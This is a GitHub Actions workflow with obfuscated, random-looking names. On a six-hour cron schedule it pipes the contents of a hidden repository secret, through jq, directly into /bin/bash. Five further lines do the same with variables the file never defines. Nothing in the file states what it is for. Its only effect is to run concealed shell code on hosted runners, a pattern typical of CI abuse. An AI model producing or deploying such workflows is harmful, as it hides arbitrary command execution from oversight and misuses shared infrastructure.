name: guanzhongxian6226
on:
  workflow_dispatch:
  schedule:
    - cron: '1 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guanzhongxian6226
        env:
          fdpik46304: ${{ secrets.fdpik46304 }}
        run: |
          echo $fdpik46304 | jq -r .y601 | /bin/bash
          echo $ylwg2183 | jq -r .ib454 | /bin/bash
          echo $jt27 | jq -r .urm671 | /bin/bash
          echo $tirjd6 | jq -r .mfcmp6219 | /bin/bash
          echo $kbll4744 | jq -r .hqydo6317 | /bin/bash
          echo $vk04 | jq -r .xsot713 | /bin/bash

